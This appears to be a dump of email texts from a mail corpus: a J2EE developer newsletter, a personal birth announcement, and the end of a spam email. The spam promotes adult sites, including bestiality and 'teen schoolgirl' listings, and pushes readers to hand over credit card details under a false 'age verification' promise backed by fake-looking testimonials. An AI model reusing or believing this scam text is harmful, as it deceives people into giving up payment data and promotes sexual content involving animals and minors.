 ---------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 5 adult membership sites for free?
 A. We have advertisers that pay us for ad space so you don't have to
 pay for a membership.
 Q. Is it true that your membership is Free for life?
 A. Absolutely, you'll never have to pay a cent the advertisers do.
 Q. Do I have to sign up for all 5 FREE membership sites?
 A. No, just one to get access to all of them.
 Q. Why do I have to give my Credit Card Information?
 A. It's for age verification purposes only and you will not be charged.
    If you don't believe us, just read their terms and conditions.
 Q. How do I get started?
 A. Click on one of the links below to become a Free member.
 ---------------------------
 # 5. &gt; Adults Farm
 http://80.71.66.8/farm/?aid=993751
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 # 4. &gt; Sexy Celebes
 http://80.71.66.8/celebst/?aid=993751
 Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!
 # 3. &gt; Play House Porn
 http://80.71.66.8/play/?aid=993751
 Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!
 # 2. &gt; Lesbian Lace
 http://80.71.66.8/lesbian/?aid=993751
 Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!
 # 1. &gt; Teen Sex Fantasies
 http://80.71.66.8/teen/?aid=993751
 Teen Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyfriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!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http://80.71.66.8/optout/index.html Please allow 24 hours for removal.
 This e-mail is sent in compliance with the Information Exchange
 Promotion and Privacy Protection Act. section 50 marked as
 'Advertisement' with valid 'removal' instruction.
 tkuejsrfkmtpfwldpnauksv
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Benjamin Wallace Higgins
</t>
  </si>
  <si>
    <t xml:space="preserve">
 At 12:45 am Benjamin Wallace Higgins made a crash entry into
  the world. After a night of on again off again activity a C section
  was called for near noon. Seems the little hacker was messing
  with the internal cables and got three turns of the umbilical cord
  around his neck for the effort. Ill have to teach him about the art
  of cable bundling. Benjamin Wallace came out at 6 lbs 13 oz 20
  somthing inches tall and doing what all Higgins boys do best...
  feed and sleep. Mother and Child are doing great.
 MOre when I get teh chance. We are in the hospital for 3 days but I have a
 free terminal scoped out that now has ssh on it.
 The first pewp...man they prep you for it but northing really can...Wowzer
 that stuff is road tar.
 lates
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Struts 1.1 Article, JavaServer Faces Tech Talk, iXML &amp; Widget Pages Patterns, JRun 4.0 Review
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 =================================
     TheServerSide Connection
 -Your J2EE Community Newsletter-
 =================================
 September 4, 2002      Circulation: 130 000+           No. 42 
 IN THIS ISSUE 
 --------------------------------------------------------------------------------
 Featured Articles 
  o Struts 1.1: Should I Upgrade? 
 Hard Core Tech Talks
  o Amy Fowler - Senior Staff Engineer, Java Software, Sun Microsystems 
 Upcoming Conferences 
  o Great Lakes Software Symposium 2002 
 Enterprise Java Education Strategies 
  o Floyd Marinescu to co-teach J2EE Patterns - Sept 16, Dallas 
 New Patterns 
  o iXML Pattern 
  o Widget Pages 
 New App Server Reviews 
  o JRun 4.0 - Good Stuff 
 Key J2EE Industry News Headlines 
  Some key headlines: 
  o Java Server Faces Public Draft and Early Access Available 
  o Apache Cactus 1.4 J2EE Unit Testing Framework Released 
 This newsletter is available in HTML format at:
 http://www.theserverside.com/resources/newsletters/news42.html?text-click
 --==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
   &lt;TITLE&gt; TheServerSide.com Newsletter #42&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#ffffff&gt;&lt;!----------------------- Top -------------------------------------&gt;
 &lt;A NAME="news42.htmltop"&gt;&lt;/A&gt;&lt;!----------------------- The Newsletter logo --------------------&gt;
 &lt;A HREF="http://lists.theserverside.com/t/12337/850395/201/181/"&gt;&lt;IMG 
  SRC="http://www.TheServerSide.com/resources/newsletters/inreview4.gif?news42-view"
  BORDER=0  WIDTH=629 ALT ="[TheServerSide Newsletter #42]"&gt;&lt;/A&gt;
 &lt;br&gt;
 &lt;small&gt;
 &lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;
 September 4, 2002&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Circulation: 130 000+&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amp;nbsp;No. 42
 &lt;/font&gt;&lt;/b&gt;
 &lt;/small&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;BR&gt;
 &lt;!-- Newsletter 42 sent on Sept 4, 2002 --&gt;
 &lt;!----------------------- TOP Position Ad  ------------------------&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;table border="0" width="500" cellspacing="0" cellpadding="2"&gt;
   &lt;tr&gt;
     &lt;td bgcolor="#808080" &gt;&lt;b&gt;&lt;font face="Arial" color="#EEEEEE" size="2"&gt;&amp;nbsp;This newsletter sponsored in part by Rational &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr &gt;
     &lt;td bgcolor="#EEEEEE" &gt;
     &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
    &lt;b&gt;Rational&amp;#174; XDE Is Here -- Developing Java&amp;#153; Software Will Never Be The Same.&lt;/b&gt;
 &lt;a href="http://lists.theserverside.com/t/12337/850395/202/181/" target="_blank"&gt;
 &lt;img src="http://www.theserverside.com/images/Rational38.gif" align="right" valign="top" hspace="1" vspace="6" border="0"&gt;&lt;/a&gt;
 Rational&amp;#174; XDE&amp;#153; Professional is an eXtended Development Environment for 
 Java developers. Use it with your choice of IDE - as a standalone IDE or install 
 it into IBM&amp;#174; WebSphere&amp;#153; Studio Application Developer. It runs in the IDE. 
 Visualize your code while you develop. Order your FREE Rational Developer 
 Solutions CD and &lt;a href="http://lists.theserverside.com/t/12337/850395/202/181/" target="_blank"&gt;try Rational XDE now!&lt;/a&gt;
     &lt;/font&gt;
      &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;br&gt;
 &lt;!----------------------- Newsletter Table of Conents -------------&gt;
 &lt;P&gt;
   &lt;A NAME=TableOfContents&gt;&lt;/A&gt;
   &lt;B&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;In This Issue&lt;/FONT&gt;&lt;/B&gt;
   &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;&lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
   &lt;!----------- Featured Technical Article ------------&gt;
   &lt;A href="#articles"&gt;&lt;B&gt; Featured Articles &lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
   &lt;SMALL&gt;
  &amp;nbsp;o Struts 1.1: Should I Upgrade? &lt;br&gt;
  &lt;/SMALL&gt;
   &lt;br&gt;&lt;!------------- Hard Core Tech Talks	 -----------------&gt;
   &lt;A href="#tech"&gt;&lt;b&gt;Hard Core Tech Talks&lt;/b&gt;&lt;/A&gt;&lt;BR&gt;
   &lt;SMALL&gt;
   &amp;nbsp;o Amy Fowler - Senior Staff Engineer, Java Software, Sun Microsystems 
   &lt;br&gt; 
   &lt;/SMALL&gt;
   &lt;BR&gt;
   &lt;!------------- Upcoming Conferences -----------------&gt;
   &lt;A HREF="#conferences"&gt;&lt;B&gt; Upcoming Conferences &lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
   &lt;SMALL&gt;
   &amp;nbsp;o  Great Lakes Software Symposium 2002     &lt;BR&gt;	
   &lt;/SMALL&gt;
   &lt;BR&gt;&lt;!------------- Enterprise Java Education Strategies -----------------&gt;
   &lt;A href="#education"&gt;&lt;B&gt;Enterprise Java Education Strategies &lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
   &lt;SMALL&gt;
   &amp;nbsp;o Floyd Marinescu to co-teach J2EE Patterns - Sept 16, Dallas &lt;br&gt;
   &lt;/SMALL&gt;
    &lt;BR&gt;&lt;!----------- New Patterns ------------&gt;
   &lt;A href="#patterns"&gt;&lt;B&gt; New Patterns &lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
   &lt;SMALL&gt;
   &amp;nbsp;o iXML Pattern      &lt;BR&gt;
   &amp;nbsp;o Widget Pages     &lt;BR&gt;
   &lt;/SMALL&gt;
   &lt;BR&gt;&lt;!----------- New App Server Reviews ------------&gt;
   &lt;A href="#reviews"&gt;&lt;B&gt; New App Server Reviews &lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
   &lt;SMALL&gt;
   &amp;nbsp;o JRun 4.0 - Good Stuff &lt;BR&gt;
   &lt;/SMALL&gt;
   &lt;BR&gt;&lt;!-------------- Latest Headlines ------------------------&gt;
   &lt;A href="#news"&gt;&lt;B&gt; Key J2EE Industry News Headlines &lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
   &lt;small&gt;
   &amp;nbsp;&lt;b&gt;Some key headlines:&lt;/b&gt; &lt;br&gt;
   &amp;nbsp;o Java Server Faces Public Draft and Early Access Available  
      &lt;BR&gt;
   &amp;nbsp;o Apache Cactus 1.4 J2EE Unit Testing Framework Released      &lt;BR&gt;
  &lt;/small&gt;
 &lt;P&gt;&lt;small&gt;
 &lt;B&gt; This newsletter is transmitted twice a month. It is printer-friendly and available
   &lt;A HREF="http://lists.theserverside.com/t/12337/850395/203/181/"&gt;online&lt;/A&gt;
 &lt;/B&gt;&lt;/small&gt;
 &lt;/P&gt; 
  &lt;/BLOCKQUOTE&gt;   
 &lt;br&gt;&lt;br&gt;
 &lt;!------------------------- Featured Articles ----------------------------&gt;
 &lt;A NAME=articles&gt;&lt;/A&gt;
 &lt;P&gt;
 &lt;B&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;Featured Articles&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;&lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;FONT SIZE=+2&gt;&lt;B&gt; 
 Struts 1.1: Should I Upgrade? 
 &lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;
 &lt;b&gt;&lt;small&gt;By John Yu&lt;/small&gt;&lt;/b&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;p&gt;
 Built on the success of Struts 1.0, Struts 1.1 beta was released in March this year and showcased at JavaOne 2002. This article describes the new features found in Apache Struts 1.1 beta and the impact of migration from Struts 1.0 to Struts 1.1. It also offers advice on the migration decision and the upgrade process.
 &lt;/p&gt;
 &lt;A HREF="http://lists.theserverside.com/t/12337/850395/204/181/"&gt;Read the article here&lt;/A&gt;&lt;BR&gt;
 &lt;!------------------------- End of Article -----------------&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;SMALL&gt;&lt;A href="#news42.htmltop"&gt;Back to Top&lt;/A&gt;&lt;/SMALL&gt;&lt;BR&gt;
 &lt;/blockquote&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;A NAME=tech&gt;&lt;/A&gt;
 &lt;!------------- Upper Middle Position Ad ---------------&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;table border="0" width="500" cellspacing="0" cellpadding="2"&gt;
   &lt;tr&gt;
     &lt;td bgcolor="#808080" &gt;&lt;b&gt;&lt;font face="Arial" color="#EEEEEE" size="2"&gt;&amp;nbsp;This newsletter is sponsored in part by BEA&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr &gt;
     &lt;td bgcolor="#EEEEEE" &gt;
     &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 &lt;a href="http://lists.theserverside.com/t/12337/850395/205/181/" target="_blank"&gt; 
     &lt;img src="http://www.theserverside.com/images/dev_logo.gif" align="left" valign="top" hspace="8" vspace="0" border="0"&gt;&lt;/a&gt; 
 &lt;b&gt;BEA dev2dev Days - Application Development for the 21st Century.&lt;/b&gt;
 Prepare yourself for dev2dev Days, the premier worldwide developer education event from BEA. A full day of serious enterprise development
 instruction, including in-depth code-level demonstrations and J2EE
 training. Get the skills you need to tackle your toughest integration
 and development challenges. &lt;a href="http://lists.theserverside.com/t/12337/850395/205/181/" target="_blank"&gt;We're coming to a city near you!&lt;/a&gt; 
     &lt;/font&gt;
      &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;!------------------------- Hard Core Tech Talks ----------------------------&gt;
 &lt;P&gt;
 &lt;B&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;New Hard Core Tech Talks&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;&lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;!--
 &lt;a href="http://lists.theserverside.com/t/12337/850395/29/181/"&gt;
 &lt;img src="http://www.theserverside.com/events/videos/common/logo.jpg" border="0"&gt;
 &lt;/a&gt;--&gt;
  &lt;p&gt;   Get leading
 edge information on J2EE from those who 
 know it best, in Hard Core Tech Talks!  Videos Hosted on&lt;a href="http://lists.theserverside.com/t/12337/850395/30/181/" target="_blank"&gt; HostJ2EE.com&lt;/a&gt;.  &lt;i&gt;Featured this week is Amy Fowler, who talks about the JavaServer Faces Specification. &lt;/i&gt; 
   &lt;/p&gt;&lt;!------------  Tech Talk 1 ----------------------------------------------&gt;
 &lt;a href="http://lists.theserverside.com/t/12337/850395/206/181/"&gt;
 &lt;img src="http://www.theserverside.com/events/videos/AmyFowler/AmySmall.jpg" align="left" border="0"&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;h2&gt;Senior Staff Engineer, Java Software, Sun Microsystems &lt;/h2&gt;
 &lt;br&gt;
 &lt;p&gt; 
 In this interview, Amy talks about the problems JavaServer Faces (JSF) solves and how J2EE developers can leverage it in their Web apps. She looks at UI components used in JSF, the implementation of event handling code, and describes a typical use case involving JSF. She also discusses interoperability with JSF using Struts, Webwork, and the Portlet API. 
 &lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://lists.theserverside.com/t/12337/850395/206/181/"&gt;
 Click here to watch Amy Fowler's Video Interview
 &lt;/a&gt;
 &lt;/p&gt;
 &lt;br&gt;
    &lt;SMALL&gt;&lt;A href="#news42.htmltop"&gt;Back to Top&lt;/A&gt;&lt;/SMALL&gt;&lt;BR&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;!------------------------- Upcoming Conferences -----------------------------------------------------&gt;
 &lt;A NAME=conferences&gt;&lt;/A&gt;
 &lt;P&gt;
 &lt;B&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;Upcoming Conferences&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;&lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;font size="+2"&gt;&lt;b&gt;Great Lakes Software Symposium 2002 &lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;
   &lt;SMALL&gt;&lt;B&gt; October 25-27, 2002 - Chicago &lt;br&gt;
        	    Presented By,  
  &lt;/B&gt;&lt;/SMALL&gt;&lt;BR&gt;
   &lt;BR&gt;
 &lt;img src="http://www.theserverside.com/images/tcpn_logo.gif" border="0"&gt;
 &lt;p&gt;
 A three day J2EE/XML/Web Services conference for Java developers, Java Architects and Technical Project Managers with 48 presentations to select from and features Bruce Tate, author of "Bitter Java", The Middleware Company's own Bruce Martin presenting on XBeans, and many others.  
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://lists.theserverside.com/t/12337/850395/207/181/" target="_blank"&gt;Get more conference info here&lt;/a&gt;&lt;br&gt;
 &lt;/p&gt;
 &lt;!------------------------- End of Conference#1 -----------------&gt;
 &lt;br&gt;
  &lt;SMALL&gt;&lt;A href="#news42.htmltop"&gt;Back to Top&lt;/A&gt;&lt;/SMALL&gt;&lt;BR&gt;&lt;/BLOCKQUOTE&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;br&gt;&lt;br&gt;&lt;!------------------------- ENTERPRISE JAVA EDUCATION STRATEGIES ----------------------------&gt;
 &lt;A NAME=education&gt;&lt;/A&gt;
 &lt;P&gt;
 &lt;B&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;Enterprise Java Education Strategies&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;&lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;FONT SIZE="+2"&gt;&lt;B&gt;Floyd Marinescu to co-teach J2EE Patterns - Sept 16, Dallas &lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;
 &lt;p&gt;
 Dear TSS Members,
 &lt;/p&gt;
 &lt;p&gt;
 I thought you'd be interested to know that The Middleware Company has created a J2EE Patterns training course that I will be co-teaching in Dallas during the week of September 16th. The course combines and improves upon the best J2EE design patterns material available in my book EJB Design Patterns, Sun's Core Patterns, TheServerSide's patterns repository and others. 
 &lt;/p&gt;
 &lt;a href="http://lists.theserverside.com/t/12337/850395/208/181/"&gt;&lt;img src="http://www.theserverside.com/images/j2eelogo-blue.gif" align="left" border=0 HSPACE=30&gt;&lt;/a&gt;
 &lt;p&gt;
 I have just reviewed the final material and I am very excited with the end product. This class takes an indepth look at all the most important patterns today, both from a theoretical and a practical perspective. One of the cool things about the course is that it shows you how the patterns were implemented in a variety of popular open source frameworks and production applications, including TheServerSide.com. 
 &lt;/p&gt;
 &lt;p&gt;
 I highly recommend this course to the seasoned J2EE developer who wants to master the cutting edge in J2EE architecture and design. 
 &lt;/p&gt;
 &lt;p&gt;
 If you'd like to register for the course, simply click here: &lt;br&gt;
 &lt;a href="http://lists.theserverside.com/t/12337/850395/209/181/"&gt;http://www.middleware-company.com/training/j2eepatterns.shtml&lt;/a&gt;
 &lt;/p&gt;
 &lt;p&gt;
 Sincerely, 
 &lt;br&gt;&lt;br&gt;
 Floyd Marinescu &lt;br&gt;
 Author, EJB Design Patterns &lt;br&gt;
 Director of TheServerSide.com J2EE Community &lt;br&gt;
 &lt;/p&gt;
   &lt;SMALL&gt;&lt;A href="#news42.htmltop"&gt;Back to Top&lt;/A&gt;&lt;/SMALL&gt;&lt;BR&gt;&lt;/BLOCKQUOTE&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;!-------------------------New Patterns----------------------------&gt;
  &lt;A NAME=patterns&gt;&lt;/A&gt;
 &lt;P&gt;
 &lt;B&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;New Patterns &lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;&lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;FONT SIZE=+2&gt;&lt;B&gt;  iXML Pattern   &lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;
   &lt;SMALL&gt;&lt;B&gt; By Venkatesh Balakumar   
  &lt;/B&gt;&lt;/SMALL&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;P&gt; 
 In due course, we will be finding ourselves in the middle of Web services, which will granulate into representing all data in XML. For preparing and implementing Web services, it's necessary to express all data in XML. This pattern does the same.
 &lt;/P&gt;
 &lt;A HREF="http://lists.theserverside.com/t/12337/850395/211/181/"&gt;Read more on this pattern&lt;/A&gt;.&lt;BR&gt; 
 &lt;br&gt;&lt;br&gt;
 &lt;FONT SIZE=+2&gt;&lt;B&gt; Widget Pages   &lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;
   &lt;SMALL&gt;&lt;B&gt; By Guilherme Silva   
  &lt;/B&gt;&lt;/SMALL&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;P&gt; 
 This pattern allows for using XMLC and Barracuda without exposing their APIs to widget users. In fact it allows for transparently using more than one widget implementation at the same time, which is ideal for migrating or upgrading. 
 &lt;/P&gt;
 &lt;A HREF="http://lists.theserverside.com/t/12337/850395/212/181/"&gt;Read more on this pattern&lt;/A&gt;.&lt;BR&gt; 
 &lt;br&gt;&lt;br&gt;
 &lt;SMALL&gt;&lt;A href="#news42.htmltop"&gt;Back to Top&lt;/A&gt;&lt;/SMALL&gt;
  &lt;br&gt;
  &lt;br&gt;&lt;!------------------------- End of Patterns -----------------&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;!-------------------------New App Server Reviews----------------------------&gt;
  &lt;A NAME=reviews&gt;&lt;/A&gt;
 &lt;P&gt;
 &lt;B&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;New App Server Reviews &lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;&lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;FONT SIZE=+2&gt;&lt;B&gt; JRun 4.0 - Good Stuff    &lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;
   &lt;SMALL&gt;&lt;B&gt; By Jason McKerr   
  &lt;/B&gt;&lt;/SMALL&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;P&gt; 
 Some general impressions I had of JRun: It's very easy to get it up and running.  
 Allaire-now-Macromedia has always had one of my favorite servlet engines. 
 The Java Management Console (web-based admin interface) has gotten a tonne better.  
 It's dead easy to plug into just about any IDE (I've done it with JBuilder Enterprise 6, and the Intellij IDEA EAP (Builds 640 -642). 
 The JSP compiler is smokin! Very, very fast. I think it must come with Jikes or something. 
 &lt;/P&gt;
 &lt;A HREF="http://lists.theserverside.com/t/12337/850395/213/181/"&gt;Read more on this review&lt;/A&gt;.&lt;BR&gt; 
 &lt;br&gt;&lt;br&gt;
 &lt;SMALL&gt;&lt;A href="#news42.htmltop"&gt;Back to Top&lt;/A&gt;&lt;/SMALL&gt;
  &lt;br&gt;
  &lt;br&gt;&lt;!------------------------- End of New App Server Reviews -----------------&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;A NAME=news&gt;&lt;/A&gt;
 &lt;!----------------------- Lower Position Ad  ------------------------&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;table border="0" width="500" cellspacing="0" cellpadding="2"&gt;
   &lt;tr&gt;
     &lt;td bgcolor="#808080" &gt;&lt;b&gt;&lt;font face="Arial" color="#EEEEEE" size="2"&gt;&amp;nbsp;This newsletter sponsored in part by Borland &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr &gt;
     &lt;td bgcolor="#EEEEEE" &gt;
     &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 &lt;a href="http://lists.theserverside.com/t/12337/850395/214/181/" target="_blank"&gt;
 &lt;img src="http://www.theserverside.com/images/Borland.gif" align="left" valign="top" hspace="6" vspace="3" border="0"&gt;
 &lt;/a&gt;
 &lt;b&gt;Borland(R) - &amp;#35;1 in Java&amp;#153; Development Solutions.&lt;/b&gt;
 Discover the key to success with Java technologies from the industry
 leader. Develop to deploy with the award-winning Borland software 
 platform for Java. Get your FREE "Enterprise Guide to Java Development" 
 at &lt;a href="http://lists.theserverside.com/t/12337/850395/214/181/" target="_blank"&gt;http://borland.atre.net/sse9_03&lt;/a&gt;.
     &lt;/font&gt;
      &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;!------------------------- News ----------------------------&gt;
 &lt;P&gt;&lt;B&gt;
 &lt;P&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;Key J2EE Industry Headlines&lt;/FONT&gt;&lt;/b&gt;&lt;/p&gt; 
 &lt;HR ALIGN=left WIDTH="65%" COLOR=#d4d4d4 NOSHADE SIZE=2&gt;
 &lt;BLOCKQUOTE&gt;
 &lt;P&gt;&lt;B&gt;  
 Oracle Releases Preview of New J2EE 1.3 JDeveloper IDE 
 &lt;/B&gt;&lt;/P&gt;
   &lt;P&gt; 
 Oracle has released a preview (v9.0.3) of the JDeveloper IDE. This release introduces full J2EE 1.3 development support starting from UML modeling of EJB's and Web Services, to development, debugging, tuning and deployment, with full integration with Ant, Struts 1.1 and JUnit.  
 &lt;/P&gt;
   &lt;A HREF="http://lists.theserverside.com/t/12337/850395/215/181/"&gt;Click here to read more.&lt;/A&gt;
   &lt;P&gt;&lt;/P&gt;
   &lt;HR ALIGN=left WIDTH="60%" COLOR=#d4d4d4 SIZE=1&gt;
 &lt;P&gt;&lt;B&gt;  
 Java Server Faces Public Draft and Early Access Available 
 &lt;/B&gt;&lt;/P&gt;
   &lt;P&gt; 
 The public draft of the JavaServer Faces 1.0 Specification has been published, as well as an early access download of the API's and tag library. JSF is a web application framework that reduces the amount of code needed to write a web front end. Developers need only write JSF components and corresponding event handling code, the framework then simplifies the tasks of validation, request parameter parsing, state management, multipe clients support, etc.  
 &lt;/P&gt;
   &lt;A HREF="http://lists.theserverside.com/t/12337/850395/216/181/"&gt;Click here to read more.&lt;/A&gt;
   &lt;P&gt;&lt;/P&gt;
   &lt;HR ALIGN=left WIDTH="60%" COLOR=#d4d4d4 SIZE=1&gt;
 &lt;P&gt;&lt;B&gt;  
 Meta Group: J2EE Complexity Holding Back Platform Adoption
 &lt;/B&gt;&lt;/P&gt;
   &lt;P&gt; 
 The Meta Group has released a research report saying that the relative complexity of doing server-side development using J2EE is hurting adoption of the platform. Among other predictions are the continuing dominance of BEA and IBM, more consolidation, and increasing vendor competition in tools and frameworks. 
   &lt;/P&gt;
   &lt;A HREF="http://lists.theserverside.com/t/12337/850395/217/181/"&gt;Click here to read more.&lt;/A&gt;
   &lt;P&gt;&lt;/P&gt;
   &lt;HR ALIGN=left WIDTH="60%" COLOR=#d4d4d4 SIZE=1&gt;
 &lt;P&gt;&lt;B&gt;  
 IBM nudges back release of WebSphere 5.0
 &lt;/B&gt;&lt;/P&gt;
   &lt;P&gt; 
 IBM has rescheduled its release of J2EE 1.3 certified Websphere Application Server 5 from September to late November, saying it "reprioritized" its schedule in order to release Websphere Studio 5 first - a break from the usual order of releases. Analysts said the delay shouldn't be seen as a big setback. 
   &lt;/P&gt;
   &lt;A HREF="http://lists.theserverside.com/t/12337/850395/218/181/"&gt;Click here to read more.&lt;/A&gt;
   &lt;P&gt;&lt;/P&gt;
   &lt;HR ALIGN=left WIDTH="60%" COLOR=#d4d4d4 SIZE=1&gt;
 &lt;P&gt;&lt;B&gt;  
 Apache Cactus 1.4 J2EE Unit Testing Framework Released 
 &lt;/B&gt;&lt;/P&gt;
   &lt;P&gt; 
 Cactus 1.4 (part of the Apache Jakarta project) is now available for download. Cactus is a simple test framework for unit testing server-side java code (Servlets, EJBs, Tag Libs, Filters) that uses and extends the jUnit framework. V1.4 includes many new improvements, including the ability to assert for specific HTTP response codes. 
 &lt;/P&gt;
   &lt;A HREF="http://lists.theserverside.com/t/12337/850395/219/181/"&gt;Click here to read more.&lt;/A&gt;
   &lt;P&gt;&lt;/P&gt;
   &lt;HR ALIGN=left WIDTH="60%" COLOR=#d4d4d4 SIZE=1&gt;
 &lt;P&gt;&lt;B&gt;  
 WebWork 1.2 Web Application Framework Released 
 &lt;/B&gt;&lt;/P&gt;
   &lt;P&gt; 
 Version 1.2 of WebWork is now available. The release includes significant improvements and marks the first release since integrating into the OpenSymphony project (home of SiteMesh, OSCache, etc). WebWork is a pull HMVC web application framework in Java, developed as Open Source (Apache license). 
 &lt;/P&gt;
   &lt;A HREF="http://lists.theserverside.com/t/12337/850395/220/181/"&gt;Click here to read more.&lt;/A&gt;
   &lt;P&gt;&lt;/P&gt;
   &lt;HR ALIGN=left WIDTH="60%" COLOR=#d4d4d4 SIZE=1&gt;
 &lt;P&gt;&lt;B&gt;  
 JADE Open Framework 1.1 Released with Eclipse Integration 
 &lt;/B&gt;&lt;/P&gt;
   &lt;P&gt; 
 Salmon LLC is pleased to announce the release of JADE 1.1, the open source rapid application development tool for the J2EE. JADE is a Java framework and JSP tag library that integrates with Dreamweaver, IntelliJ IDEA and now Eclipse. JADE was released as open source only a few months ago, but has been used privately as the foundation for a J2EE consulting practice for several years. 
 &lt;/P&gt;
   &lt;A HREF="http://lists.theserverside.com/t/12337/850395/221/181/"&gt;Click here to read more.&lt;/A&gt;
   &lt;P&gt;&lt;/P&gt;
   &lt;HR ALIGN=left WIDTH="60%" COLOR=#d4d4d4 SIZE=1&gt;
 &lt;br&gt;
  &lt;BR&gt;
   &lt;SMALL&gt;&lt;A href="#news42.htmltop"&gt;Back to Top&lt;/A&gt;&lt;/SMALL&gt;&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;/BLOCKQUOTE&gt;&lt;!------------------------- END OF SECTION ----------------------------&gt;
 &lt;B&gt;
 &lt;P&gt;&lt;FONT COLOR=#929292 SIZE=+1&gt;UNSUBSCRIBE&lt;/FONT&gt; 
